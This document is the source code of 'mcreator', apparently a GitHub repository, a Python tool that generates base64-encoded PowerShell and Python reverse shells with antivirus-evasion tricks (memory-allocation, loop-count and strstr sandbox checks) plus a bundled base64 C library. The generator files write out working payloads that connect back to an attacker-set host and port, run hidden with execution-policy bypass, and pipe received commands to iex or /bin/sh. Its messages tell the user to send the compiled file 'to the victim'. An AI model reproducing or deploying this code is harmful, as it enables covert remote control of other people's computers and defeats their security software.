├── README.md ├── lib ├── b64.h ├── encode.c └── decode.c ├── mcreatorlib.py ├── mcreatorshells.py ├── mcreator.py └── mcreatortechniques.py /README.md: -------------------------------------------------------------------------------- 1 | # mcreator 2 | Encoded Reverse Shell Generator With Techniques To Bypass AV's 3 | 4 | ## Installation 5 | ``` 6 | git clone https://github.com/blacknbunny/mcreator.git && cd mcreator/ && python mcreator.py 7 | ``` 8 | 9 | ## Version 10 | ***python 2.7.**** can't be lower or higher than 2.7 cause of the """ syntax in scripts. 11 | 12 | ## Runnig mcreator console 13 | ``` 14 | python mcreator.py -rsg console 15 | ``` 16 | 17 | ## Commands 18 | https://github.com/blacknbunny/mcreator/wiki/Commands 19 | 20 | ## Reverse Shells 21 | https://github.com/blacknbunny/mcreator/wiki/Reverse-Shells 22 | 23 | ## Techniques 24 | https://github.com/blacknbunny/mcreator/wiki/Techniques 25 | 26 | ## Compiling 27 | https://github.com/blacknbunny/mcreator/wiki/Compiling 28 | 29 | ## An example to tool 30 | https://github.com/blacknbunny/mcreator/wiki/An-example 31 | 32 | ## Help 33 | ``` 34 | usage: mcreator.py [-h] [-rsg RSGENERATOR] 35 | 36 | Reverse Shell generator with techniques to bypass all the AV's 37 | 38 | optional arguments: 39 | -h, --help show this help message and exit 40 | -rsg RSGENERATOR, --rsgenerator RSGENERATOR 41 | Reverse Shell Generator With Encryptions & Techniques 42 | ``` 43 | -------------------------------------------------------------------------------- /lib/b64.h: -------------------------------------------------------------------------------- 1 | 2 | /** 3 | * `b64.h' - b64 4 | * 5 | * copyright (c) 2014 joseph werle 6 | */ 7 | 8 | #ifndef B64_H 9 | #define B64_H 1 10 | 11 | /** 12 | * Memory allocation functions to use. You can define b64_malloc and 13 | * b64_realloc to custom functions if you want. 14 | */ 15 | 16 | #ifndef b64_malloc 17 | # define b64_malloc(ptr) malloc(ptr) 18 | #endif 19 | #ifndef b64_realloc 20 | # define b64_realloc(ptr, size) realloc(ptr, size) 21 | #endif 22 | 23 | /** 24 | * Base64 index table. 25 | */ 26 | 27 | static const char b64_table[] = { 28 | 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 29 | 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 30 | 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 31 | 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 32 | 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 33 | 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 34 | 'w', 'x', 'y', 'z', '0', '1', '2', '3', 35 | '4', '5', '6', '7', '8', '9', '+', '/' 36 | }; 37 | 38 | #ifdef __cplusplus 39 | extern "C" { 40 | #endif 41 | 42 | /** 43 | * Encode `unsigned char *' source with `size_t' size. 44 | * Returns a `char *' base64 encoded string. 45 | */ 46 | 47 | char * 48 | b64_encode (const unsigned char *, size_t); 49 | 50 | /** 51 | * Dencode `char *' source with `size_t' size. 52 | * Returns a `unsigned char *' base64 decoded string. 53 | */ 54 | unsigned char * 55 | b64_decode (const char *, size_t); 56 | 57 | /** 58 | * Dencode `char *' source with `size_t' size. 59 | * Returns a `unsigned char *' base64 decoded string + size of decoded string. 60 | */ 61 | unsigned char * 62 | b64_decode_ex (const char *, size_t, size_t *); 63 | 64 | #ifdef __cplusplus 65 | } 66 | #endif 67 | 68 | #endif -------------------------------------------------------------------------------- /mcreatorlib.py: -------------------------------------------------------------------------------- 1 | reverse_shell = "" 2 | lhost = "192.168.0.101" 3 | lport = int(4444) 4 | encode_type = "" 5 | technique = "" 6 | 7 | def reverse_shells(): 8 | print("\nWindows : ") 9 | print("powershell # OS : Windows(x86, x64), Type : Command line, File type : *.exe") 10 | print("\nLinux : ") 11 | print("python # OS : Linux(x86, x86_64), Type : Command line, File type : *.py\n") 12 | def techniques(): 13 | print("\n(0) : Don't want to use any technique") 14 | print("\n(1) : strstr # Default\n") 15 | print("(2) : toomuchmem\n") 16 | print("(3) : increment\n") 17 | def encode_types(): 18 | print("\nbase64 *= ( default )\n") 19 | def help(): 20 | print("\nShows :\n") 21 | print("show reverse_shells # Shows reverse_shells list") 22 | print("show techniques # Shows techniques that you can use with reverse_shells to bypass AV's") 23 | print("show encode_types # Shows Encode Types To Escape AV's") 24 | print("show help # Shows help menu of commands\n\n") 25 | print("Sets :\n") 26 | print("set reverse_shell [powershell, python ..] # Sets Reverse Shell") 27 | print("set LHOST [ip] # Sets Local Host") 28 | print("set LPORT [port] # Sets Local Port") 29 | print("set encode [encode_type] # Sets Encode Type Of Reverse Shell\n") 30 | print("Others: \n") 31 | print("run # Creates the encoded reverse_shell file if set options is right") 32 | print("exit # Exits from the script\n") 33 | def exit(): 34 | print("Exit successful !") 35 | 36 | -------------------------------------------------------------------------------- /lib/encode.c: -------------------------------------------------------------------------------- 1 | 2 | /** 3 | * `encode.c' - b64 4 | * 5 | * copyright (c) 2014 joseph werle 6 | */ 7 | 8 | #include 9 | #include 10 | #include "b64.h" 11 | 12 | #ifdef b64_USE_CUSTOM_MALLOC 13 | extern void* b64_malloc(size_t); 14 | #endif 15 | 16 | #ifdef b64_USE_CUSTOM_REALLOC 17 | extern void* b64_realloc(void*, size_t); 18 | #endif 19 | 20 | char * 21 | b64_encode (const unsigned char *src, size_t len) { 22 | int i = 0; 23 | int j = 0; 24 | char *enc = NULL; 25 | size_t size = 0; 26 | unsigned char buf[4]; 27 | unsigned char tmp[3]; 28 | 29 | // alloc 30 | enc = (char *) b64_malloc(1); 31 | if (NULL == enc) { return NULL; } 32 | 33 | // parse until end of source 34 | while (len--) { 35 | // read up to 3 bytes at a time into `tmp' 36 | tmp[i++] = *(src++); 37 | 38 | // if 3 bytes read then encode into `buf' 39 | if (3 == i) { 40 | buf[0] = (tmp[0] & 0xfc) >> 2; 41 | buf[1] = ((tmp[0] & 0x03) << 4) + ((tmp[1] & 0xf0) >> 4); 42 | buf[2] = ((tmp[1] & 0x0f) << 2) + ((tmp[2] & 0xc0) >> 6); 43 | buf[3] = tmp[2] & 0x3f; 44 | 45 | // allocate 4 new byts for `enc` and 46 | // then translate each encoded buffer 47 | // part by index from the base 64 index table 48 | // into `enc' unsigned char array 49 | enc = (char *) b64_realloc(enc, size + 4); 50 | for (i = 0; i < 4; ++i) { 51 | enc[size++] = b64_table[buf[i]]; 52 | } 53 | 54 | // reset index 55 | i = 0; 56 | } 57 | } 58 | 59 | // remainder 60 | if (i > 0) { 61 | // fill `tmp' with `\0' at most 3 times 62 | for (j = i; j < 3; ++j) { 63 | tmp[j] = '\0'; 64 | } 65 | 66 | // perform same codec as above 67 | buf[0] = (tmp[0] & 0xfc) >> 2; 68 | buf[1] = ((tmp[0] & 0x03) << 4) + ((tmp[1] & 0xf0) >> 4); 69 | buf[2] = ((tmp[1] & 0x0f) << 2) + ((tmp[2] & 0xc0) >> 6); 70 | buf[3] = tmp[2] & 0x3f; 71 | 72 | // perform same write to `enc` with new allocation 73 | for (j = 0; (j < i + 1); ++j) { 74 | enc = (char *) b64_realloc(enc, size + 1); 75 | enc[size++] = b64_table[buf[j]]; 76 | } 77 | 78 | // while there is still a remainder 79 | // append `=' to `enc' 80 | while ((i++ < 3)) { 81 | enc = (char *) b64_realloc(enc, size + 1); 82 | enc[size++] = '='; 83 | } 84 | } 85 | 86 | // Make sure we have enough space to add '\0' character at end. 87 | enc = (char *) b64_realloc(enc, size + 1); 88 | enc[size] = '\0'; 89 | 90 | return enc; 91 | } -------------------------------------------------------------------------------- /mcreatorshells.py: -------------------------------------------------------------------------------- 1 | def powershell(lhost, lport): 2 | file = open("lib/pwshell.c", "wb+") 3 | start_one = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgXCIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCc=" 4 | start_two = "JHN0cmVhbSA9ICRjbGllbnQuR2V0U3RyZWFtKCk7W2J5dGVbXV0kYnl0ZXMgPSAwLi42NTUzNXwlezB9O3doaWxlKCgkaSA9ICRzdHJlYW0uUmVhZCgkYnl0ZXMsIDAsJGJ5dGVzLkxlbmd0aCkpIC1uZSAwKXs7JGRhdGEgPSAoTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRieXRlcywwLCAkaSk7JHNlbmRiYWNrID0gKGlleCAkZGF0YSAyPiYxIHwgT3V0LVN0cmluZyApOyRzZW5kYmFjazIgPSRzZW5kYmFjayArICdQUyAnICsgKHB3ZCkuUGF0aCArICc+ICc7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfTskY2xpZW50LkNsb3NlKClcIiIpOwo=" 5 | 6 | file.write("""#include 7 | #include 8 | #include 9 | #include "b64.h" 10 | 11 | int main(){ 12 | char *str = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgIiRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5UQ1BDbGllbnQoJw=="; 13 | char *str3 = b64_decode(str, strlen(str)); 14 | char str5[1024]; 15 | snprintf(str5, sizeof(str5), "%02s""" + lhost + """',""" + str(lport) + """);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\"", str3); 16 | system(str5); 17 | } 18 | 19 | """) 20 | print("\n[+] Hidden Process Base64 Encoded Powershell Reverse Shell generated [+]") 21 | print("\n[+] How to compile : gcc lib/decode.c lib/pwshell.c -o pwshell [+]\n") 22 | print("[+] After compiling you can send the reverse shell(pwshell.exe) to the victim [+]\n") 23 | 24 | def python(lhost, lport): 25 | file = open("lib/pyshell.py", "wb+") 26 | 27 | file.write("""from os import system 28 | from base64 import b64decode 29 | 30 | str = "Iiw=" 31 | str1 = "cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgi" 32 | str2 = "KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsn" 33 | 34 | str3 = "%s" % (b64decode(str1) + \"""" + lhost + """\" + b64decode(str) + \"""" + str(lport) + """\" + b64decode(str2)) 35 | 36 | system(str3) 37 | """) 38 | print("\n[+] Base64 Encoded Python Reverse Shell Generated [+]") 39 | print("\nPath : lib/pyshell.py\n") 40 | -------------------------------------------------------------------------------- /lib/decode.c: -------------------------------------------------------------------------------- 1 | 2 | /** 3 | * `decode.c' - b64 4 | * 5 | * copyright (c) 2014 joseph werle 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | #include "b64.h" 12 | 13 | #ifdef b64_USE_CUSTOM_MALLOC 14 | extern void* b64_malloc(size_t); 15 | #endif 16 | 17 | #ifdef b64_USE_CUSTOM_REALLOC 18 | extern void* b64_realloc(void*, size_t); 19 | #endif 20 | 21 | unsigned char * 22 | b64_decode (const char *src, size_t len) { 23 | return b64_decode_ex(src, len, NULL); 24 | } 25 | 26 | unsigned char * 27 | b64_decode_ex (const char *src, size_t len, size_t *decsize) { 28 | int i = 0; 29 | int j = 0; 30 | int l = 0; 31 | size_t size = 0; 32 | unsigned char *dec = NULL; 33 | unsigned char buf[3]; 34 | unsigned char tmp[4]; 35 | 36 | // alloc 37 | dec = (unsigned char *) b64_malloc(1); 38 | if (NULL == dec) { return NULL; } 39 | 40 | // parse until end of source 41 | while (len--) { 42 | // break if char is `=' or not base64 char 43 | if ('=' == src[j]) { break; } 44 | if (!(isalnum(src[j]) || '+' == src[j] || '/' == src[j])) { break; } 45 | 46 | // read up to 4 bytes at a time into `tmp' 47 | tmp[i++] = src[j++]; 48 | 49 | // if 4 bytes read then decode into `buf' 50 | if (4 == i) { 51 | // translate values in `tmp' from table 52 | for (i = 0; i < 4; ++i) { 53 | // find translation char in `b64_table' 54 | for (l = 0; l < 64; ++l) { 55 | if (tmp[i] == b64_table[l]) { 56 | tmp[i] = l; 57 | break; 58 | } 59 | } 60 | } 61 | 62 | // decode 63 | buf[0] = (tmp[0] << 2) + ((tmp[1] & 0x30) >> 4); 64 | buf[1] = ((tmp[1] & 0xf) << 4) + ((tmp[2] & 0x3c) >> 2); 65 | buf[2] = ((tmp[2] & 0x3) << 6) + tmp[3]; 66 | 67 | // write decoded buffer to `dec' 68 | dec = (unsigned char *) b64_realloc(dec, size + 3); 69 | if (dec != NULL){ 70 | for (i = 0; i < 3; ++i) { 71 | dec[size++] = buf[i]; 72 | } 73 | } else { 74 | return NULL; 75 | } 76 | 77 | // reset 78 | i = 0; 79 | } 80 | } 81 | 82 | // remainder 83 | if (i > 0) { 84 | // fill `tmp' with `\0' at most 4 times 85 | for (j = i; j < 4; ++j) { 86 | tmp[j] = '\0'; 87 | } 88 | 89 | // translate remainder 90 | for (j = 0; j < 4; ++j) { 91 | // find translation char in `b64_table' 92 | for (l = 0; l < 64; ++l) { 93 | if (tmp[j] == b64_table[l]) { 94 | tmp[j] = l; 95 | break; 96 | } 97 | } 98 | } 99 | 100 | // decode remainder 101 | buf[0] = (tmp[0] << 2) + ((tmp[1] & 0x30) >> 4); 102 | buf[1] = ((tmp[1] & 0xf) << 4) + ((tmp[2] & 0x3c) >> 2); 103 | buf[2] = ((tmp[2] & 0x3) << 6) + tmp[3]; 104 | 105 | // write remainer decoded buffer to `dec' 106 | dec = (unsigned char *) b64_realloc(dec, size + (i - 1)); 107 | if (dec != NULL){ 108 | for (j = 0; (j < i - 1); ++j) { 109 | dec[size++] = buf[j]; 110 | } 111 | } else { 112 | return NULL; 113 | } 114 | } 115 | 116 | // Make sure we have enough space to add '\0' character at end. 117 | dec = (unsigned char *) b64_realloc(dec, size + 1); 118 | if (dec != NULL){ 119 | dec[size] = '\0'; 120 | } else { 121 | return NULL; 122 | } 123 | 124 | // Return back the size of decoded string if demanded. 125 | if (decsize != NULL) { 126 | *decsize = size; 127 | } 128 | 129 | return dec; 130 | } -------------------------------------------------------------------------------- /mcreator.py: -------------------------------------------------------------------------------- 1 | import mcreatorlib, mcreatorshells, mcreatortechniques 2 | import socket, subprocess, argparse 3 | from sys import argv, exit 4 | 5 | __AUTHOR__ = "@blacknbunny" 6 | 7 | parser = argparse.ArgumentParser(description="Reverse Shell & Injector generator with techniques to bypass all the AV's") 8 | parser.add_argument('-rsg', '--rsgenerator', help='Reverse Shell Generator With Encryptions & Techniques You Add Or Pick') 9 | args = parser.parse_args() 10 | 11 | if not len(argv) > 1: 12 | parser.print_help() 13 | exit(1) 14 | 15 | class ReverseShellGenerator: 16 | def set_technique(self, creator, technique, lhost, lport): 17 | egg = 0 18 | if technique == "0": 19 | mcreatortechniques.zerotechnique() 20 | elif technique == "": 21 | mcreatortechniques.zerotechnique() 22 | elif technique == "show techniques": 23 | mcreatorlib.techniques() 24 | elif technique == "1": 25 | print("\nTechnique = strstr\n") 26 | mcreatorlib.technique = "strstr" 27 | mcreatortechniques.strstr(lhost, lport) 28 | elif technique == "2": 29 | print("\nTechnique = toomuchmem\n") 30 | mcreatorlib.technique = "toomuchmem" 31 | mcreatortechniques.toomuchmem(lhost, lport) 32 | elif technique == "3": 33 | print("\nTechnique = increment\n") 34 | mcreatorlib.technique = "increment" 35 | mcreatortechniques.increment(lhost, lport) 36 | else: 37 | mcreatortechniques.zerotechnique() 38 | 39 | def set_lhost(self, creator): 40 | err = 0 41 | mcreatorlib.lhost = creator[10:] 42 | try: 43 | socket.inet_aton(mcreatorlib.lhost) 44 | except socket.error: 45 | err = 1 46 | print("[!] Not A Valid IP Address : " + mcreatorlib.lhost ) 47 | if err != 1: 48 | print("\nLHOST = " + mcreatorlib.lhost + "\n") 49 | 50 | 51 | def set_lport(self, creator): 52 | mcreatorlib.lport = int(creator[10:]) 53 | if type(mcreatorlib.lport) == int: 54 | print("\nLPORT = " + str(mcreatorlib.lport) + "\n") 55 | else: 56 | print("\n[!] Not A Valid Port : " + str(mcreatorlib.lport) + "\n" ) 57 | 58 | def set_encode(self, creator): 59 | mcreatorlib.encode_type = creator[11:] 60 | if mcreatorlib.encode_type == "base64": 61 | print("\nEncode Type = " + mcreatorlib.encode_type + "\n") 62 | else: 63 | print("\nshow encode_types\n") 64 | 65 | def set_reverse_shell(self, creator): 66 | if creator[18:] == "powershell": 67 | mcreatorlib.reverse_shell = "powershell" 68 | print("\nreverse_shell = powershell\n") 69 | elif creator[18:] == "python": 70 | mcreatorlib.reverse_shell = "python" 71 | print("\nreverse_shell = python\n") 72 | else: 73 | print("\nshow reverse_shells\n") 74 | 75 | def run(self, lhost, lport, reverse_shell): 76 | if lhost == "": 77 | print("\n[!] Wrong LHOST, LPORT or encode_type. Can't run please start script again. [!]\n") 78 | exit(1) 79 | if reverse_shell == "powershell": 80 | mcreatorshells.powershell(lhost, lport) 81 | if reverse_shell == "python": 82 | mcreatorshells.python(lhost, lport) 83 | 84 | 85 | def allinone(self): 86 | count = 0 87 | reverse_shell = "" 88 | lhost = "" 89 | lport = 4444 90 | encode_type = "" 91 | 92 | while count == 0: 93 | creator = raw_input("creator > ") 94 | 95 | if creator.startswith("set"): 96 | if creator[4:17] == "reverse_shell": 97 | if creator[18:] == "powershell": 98 | print("") 99 | technique = raw_input("Technique (show techniques) : ") 100 | set_technique = self.set_technique(creator, technique, lhost, lport) 101 | else: 102 | self.set_reverse_shell(creator) 103 | reverse_shell = mcreatorlib.reverse_shell 104 | elif creator[4:9] == "LHOST": 105 | self.set_lhost(creator) 106 | lhost = mcreatorlib.lhost 107 | elif creator[4:9] == "LPORT": 108 | self.set_lport(creator) 109 | lport = mcreatorlib.lport 110 | elif creator[4:10] == "encode": 111 | self.set_encode(creator) 112 | encode_type = mcreatorlib.encode_type 113 | else: 114 | print("\n[!] Unknown set option\n") 115 | elif creator == "show reverse_shells": 116 | mcreatorlib.reverse_shells() 117 | elif creator == "show techniques": 118 | mcreatorlib.techniques() 119 | elif creator == "show encode_types": 120 | mcreatorlib.encode_types() 121 | elif creator == "run": 122 | self.run(lhost, lport, reverse_shell) 123 | if mcreatorlib.technique != "": 124 | mcreatortechniques.printtechnique(mcreatorlib.technique) 125 | mcreatorlib.technique = "" 126 | elif creator == "show help": 127 | mcreatorlib.help() 128 | elif creator == "exit": 129 | mcreatorlib.exit() 130 | count = 1 131 | else: 132 | print("\nCommand for help: show help\n") 133 | def main(): 134 | try: 135 | if args.rsgenerator == "console": 136 | rsgenerator = ReverseShellGenerator() 137 | rsgenerator.allinone() 138 | except Exception as e: 139 | print(e) 140 | parser.print_help() 141 | exit(1) 142 | 143 | if __name__ == '__main__': 144 | try: 145 | exit(main()) 146 | except KeyboardInterrupt as e: 147 | print("^C") 148 | -------------------------------------------------------------------------------- /mcreatortechniques.py: -------------------------------------------------------------------------------- 1 | def zerotechnique(): 2 | print("Technique = 0 # Not Using Any Technique") 3 | def printtechnique(technique): 4 | print("\n[+] Hidden Process Base64 Encoded Powershell Reverse Shell generated [+]") 5 | print("\n[+] How to compile : gcc lib/decode.c lib/pwshell.c -o pwshell [+]\n") 6 | print("[+] Technique = " + technique + " [+]\n") 7 | print("[+] After compiling you can send the reverse shell(pwshell.exe) to the victim [+]\n") 8 | 9 | def strstr(lhost, lport): 10 | file = open("lib/pwshell.c", "wb+") 11 | start_one = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgXCIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCc=" 12 | start_two = "JHN0cmVhbSA9ICRjbGllbnQuR2V0U3RyZWFtKCk7W2J5dGVbXV0kYnl0ZXMgPSAwLi42NTUzNXwlezB9O3doaWxlKCgkaSA9ICRzdHJlYW0uUmVhZCgkYnl0ZXMsIDAsJGJ5dGVzLkxlbmd0aCkpIC1uZSAwKXs7JGRhdGEgPSAoTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRieXRlcywwLCAkaSk7JHNlbmRiYWNrID0gKGlleCAkZGF0YSAyPiYxIHwgT3V0LVN0cmluZyApOyRzZW5kYmFjazIgPSRzZW5kYmFjayArICdQUyAnICsgKHB3ZCkuUGF0aCArICc+ICc7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfTskY2xpZW50LkNsb3NlKClcIiIpOwo=" 13 | 14 | file.write("""#include 15 | #include 16 | #include 17 | #include "b64.h" 18 | 19 | int main(int argc, char * argv[]){ 20 | if(strstr(argv[0], argv[0]) >0){ 21 | char *str = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgIiRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5UQ1BDbGllbnQoJw=="; 22 | char *str3 = b64_decode(str, strlen(str)); 23 | char str5[1024]; 24 | snprintf(str5, sizeof(str5), "%02s""" + lhost + """',""" + str(lport) + """);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\"", str3); 25 | system(str5); 26 | } 27 | } 28 | 29 | """) 30 | 31 | def toomuchmem(lhost,lport): 32 | file = open("lib/pwshell.c", "wb+") 33 | start_one = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgXCIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCc=" 34 | start_two = "JHN0cmVhbSA9ICRjbGllbnQuR2V0U3RyZWFtKCk7W2J5dGVbXV0kYnl0ZXMgPSAwLi42NTUzNXwlezB9O3doaWxlKCgkaSA9ICRzdHJlYW0uUmVhZCgkYnl0ZXMsIDAsJGJ5dGVzLkxlbmd0aCkpIC1uZSAwKXs7JGRhdGEgPSAoTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRieXRlcywwLCAkaSk7JHNlbmRiYWNrID0gKGlleCAkZGF0YSAyPiYxIHwgT3V0LVN0cmluZyApOyRzZW5kYmFjazIgPSRzZW5kYmFjayArICdQUyAnICsgKHB3ZCkuUGF0aCArICc+ICc7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfTskY2xpZW50LkNsb3NlKClcIiIpOwo=" 35 | 36 | file.write("""#include 37 | #include 38 | #include 39 | #include "b64.h" 40 | 41 | #define TOO_MUCH_MEM 100000000 42 | 43 | int main(){ 44 | char * memdmp = NULL; 45 | memdmp = (char *) malloc(TOO_MUCH_MEM); 46 | if(memdmp!=NULL) 47 | { 48 | memset(memdmp,00, TOO_MUCH_MEM); 49 | free(memdmp); 50 | char *str = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgIiRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5UQ1BDbGllbnQoJw=="; 51 | char *str3 = b64_decode(str, strlen(str)); 52 | char str5[1024]; 53 | snprintf(str5, sizeof(str5), "%02s""" + lhost + """',""" + str(lport) + """);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\"", str3); 54 | system(str5); 55 | } 56 | } 57 | 58 | """) 59 | 60 | 61 | def increment(lhost,lport): 62 | file = open("lib/pwshell.c", "wb+") 63 | start_one = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgXCIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCc=" 64 | start_two = "JHN0cmVhbSA9ICRjbGllbnQuR2V0U3RyZWFtKCk7W2J5dGVbXV0kYnl0ZXMgPSAwLi42NTUzNXwlezB9O3doaWxlKCgkaSA9ICRzdHJlYW0uUmVhZCgkYnl0ZXMsIDAsJGJ5dGVzLkxlbmd0aCkpIC1uZSAwKXs7JGRhdGEgPSAoTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRieXRlcywwLCAkaSk7JHNlbmRiYWNrID0gKGlleCAkZGF0YSAyPiYxIHwgT3V0LVN0cmluZyApOyRzZW5kYmFjazIgPSRzZW5kYmFjayArICdQUyAnICsgKHB3ZCkuUGF0aCArICc+ICc7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfTskY2xpZW50LkNsb3NlKClcIiIpOwo=" 65 | 66 | file.write("""#include 67 | #include 68 | #include 69 | #include "b64.h" 70 | 71 | #define MAX_OP 100000000 72 | 73 | int main(){ 74 | int cpt = 0; 75 | int i = 0; 76 | for (i =0; i < MAX_OP; i ++) 77 | { 78 | cpt++; 79 | } 80 | if(cpt == MAX_OP) 81 | { 82 | char *str = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgIiRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5UQ1BDbGllbnQoJw=="; 83 | char *str3 = b64_decode(str, strlen(str)); 84 | char str5[1024]; 85 | snprintf(str5, sizeof(str5), "%02s""" + lhost + """',""" + str(lport) + """);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\"", str3); 86 | system(str5); 87 | } 88 | } 89 | 90 | """) 91 | --------------------------------------------------------------------------------